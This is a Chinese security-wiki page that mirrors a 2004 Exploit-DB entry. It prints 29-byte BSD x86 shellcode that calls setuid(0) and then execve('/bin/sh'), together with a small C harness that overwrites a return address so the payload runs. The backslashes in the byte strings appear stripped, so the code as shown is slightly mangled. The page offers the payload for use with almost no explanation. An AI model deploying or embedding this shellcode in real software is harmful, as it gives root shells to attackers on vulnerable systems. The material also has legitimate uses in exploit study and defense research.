BSD/x86 – execve(/bin/sh) + setuid(0) Shellcode (29 bytes)

BSD/x86 – execve(/bin/sh) + setuid(0) Shellcode (29 bytes)

漏洞ID 1054690 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-BSD/x86 – execve(/bin/sh) + setuid(0) Shellcode (29 bytes)-安全小百科CVE编号 N/A
图片[2]-BSD/x86 – execve(/bin/sh) + setuid(0) Shellcode (29 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 BSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13247
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
   *BSD version
   FreeBSD, OpenBSD, NetBSD.

   [email protected]

   29 bytes.

   -setuid(0);
   -execve(/bin/sh);
*/

char shellcode[]=

   "x31xc0"                      // xor          %eax,%eax
   "x50"                          // push         %eax
   "xb0x17"                      // mov          $0x17,%al
   "x50"                          // push         %eax
   "xcdx80"                      // int          $0x80
   "x50"                          // push         %eax
   "x68x6ex2fx73x68"          // push         $0x68732f6e
   "x68x2fx2fx62x69"          // push         $0x69622f2f
   "x89xe3"                      // mov          %esp,%ebx
   "x50"                          // push         %eax
   "x54"                          // push         %esp
   "x53"                          // push         %ebx
   "x50"                          // push         %eax
   "xb0x3b"                      // mov          $0x3b,%al
   "xcdx80";                     // int          $0x80

main()
{
   int *ret;
   printf("Shellcode lenght=%dn",sizeof(shellcode));
   ret=(int*)&ret+2;
   (*ret)=(int)shellcode;
}

// milw0rm.com [2004-09-26]

相关推荐: Cisco Resource Manager信息泄露漏洞

Cisco Resource Manager信息泄露漏洞 漏洞ID 1206716 漏洞类型 未知 发布时间 1999-12-31 更新时间 1999-12-31 CVE编号 CVE-1999-1042 CNNVD-ID CNNVD-199912-174 漏洞…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享